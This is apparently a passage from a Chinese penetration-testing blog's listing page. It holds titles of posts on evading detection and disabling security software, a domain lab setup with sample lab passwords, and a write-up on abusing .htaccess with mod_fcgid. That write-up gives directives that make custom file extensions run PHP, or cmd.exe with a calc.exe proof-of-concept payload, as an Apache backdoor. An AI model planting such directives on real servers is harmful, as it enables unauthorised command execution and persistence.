加密反弹shell流量绕过天眼

作者: knickers
时间: 2020-03-31
分类: 内网渗透,网络安全
评论

简易域环境搭建-内网渗透第一步-cdnsu信安实验室新生课

作者: knickers
时间: 2020-03-28
分类: 内网渗透,网络安全
评论

简易域环境搭建-内网渗透第一步-cdnsu信安实验室

单域环境搭建

环境：windows server2018 r2 update sp1
-w214

网关：192.168.1.1
dc:192.168.1.100
administrator/1qaz@WSX
web01:192.168.1.101
web-01/123!@#qweQWE
web02:192.168.1.102
web-02/123!@#qweQWE

dc

首先设置静态ip
-w457

dcpromo

-w508

-w494
-w503
-w602
一路下一步，然后重启计算机。接下来是修改计算机名
-w661
-w414
修改后还需要重启，这样，dc机器就配置好了。

web01/web02

web01和web02配置基本相同，只有静态ip不同，我就放到一起截屏了。
首先在dc上添加用户 web-01/web-02
-w759

-w440
-w442
添加之后，到web-01机器上配置网络
-w456

-w434
修改主机名处加入域中，然后重启。
需要登录刚刚的web-01账号。

-w1557

不使用密码卸载和退出TQ各版本方法

作者: knickers
时间: 2020-03-27
分类: 内网渗透,网络安全
评论

在对方无法开启rdp服务时如何远程登录对方桌面

作者: knickers
时间: 2020-03-27
分类: 内网渗透,网络安全,权限维持
评论

Apache HTTP Server Remote Command Execution via .htaccess & mod_fcgid.so（apache 命令执行后门）

作者: knickers
时间: 2019-10-30
分类: 内网渗透,网络安全
评论

Apache HTTP Server Remote Command Execution via .htaccess & mod_fcgid.so

就是用这么标题党的题目名，上周和学长一起研究了下.htaccess的配置参数，发现一个有趣的现象，利用这种方法扩展了.htaccess攻击方式，顺便也提供了一种绕过dis_funcation的思路。

各类php解析器特点：
CGI：是 Web Server 与 Web Application 之间数据交换的一种协议。
FastCGI：同 CGI，是一种通信协议，但比 CGI 在效率上做了一些优化。同样，SCGI 协议与 FastCGI 类似。
PHP-CGI：是 PHP （Web Application）对 Web Server 提供的 CGI 协议的接口程序。
PHP-FPM：是 PHP（Web Application）对 Web Server 提供的 FastCGI 协议的接口程序，额外还提供了相对智能一些任务管理。

在phpstudy 2019 pro中引入了fcgid模块配置多个PHP版本共存:
https://blog.csdn.net/zhouzme/article/details/53995566

FcgidInitialEnv PHPRC "C:/ProgramFiles(x86)/php7.0"
FcgidWrapper "C:/ProgramFiles(x86)/php7.0/php-cgi.exe" .php

配置多版本共存的好处就如下图

其中配置如果开启了AllowOverride all或者AllowOverride Options FileInfo
就可以使目录中的.htaccess生效。

但是引入了fcgid模块了传统的.htaccess指定特定文件后缀为php解析的功能无法生效。

简而言之就是在PHPstudy 2019 pro上使用以前的.htaccess制作后门，或者利用上传漏洞就失效了。

接下来先说针对phpstudy 2019pro怎么使其生效：

原本的.htaccess后门配置信息:

<FilesMatch "xiaodi">
Sethandler application/x-httpd-php
</Eilesmatch >

这样在最新的phpstudy不生效。
想到是否可以利用fcgid模块来设置添加解析：

AddHandler fcgid-script .abc
FcgidWrapper "D:/phpstudy_pro/Extensions/php/php7.3.4nts/php-cgi.exe" .abc

就可以使.abc后缀的内容生效了，但是又有问题了。没有php-cgi.exe的路径怎么办呢。
后来我想是否可以使用相对路径，因为phpstudy的php目录名字确定，目录结构固定。然后测试了下。

AddHandler fcgid-script .abc
FcgidWrapper "../../php/php5.6.9nts/php-cgi.exe" .abc

这里需要说明下相对路径相对使用的是php的session_save_temp路径。

到这里phpstudy利用就结束了

接下来说下apache 命令执行的问题：

学长看了下指向的php-cgi.exe想了下能不能直接更改exe文件然访问特定后缀的文件后触发后门。（也就是说这里其实可以用作一个apache的后门使用。）

我看到了command????
然后就有了如下丧心病狂的尝试:

AddHandler fcgid-script .abc
FcgidWrapper "C:/Windows/System32/cmd.exe /c start calc.exe" .abc

apache-rce

2333333,执行成功.利用procmon查看下进程信息:

惊不惊喜、意不意外。

分类内网渗透下的文章

加密反弹shell流量绕过天眼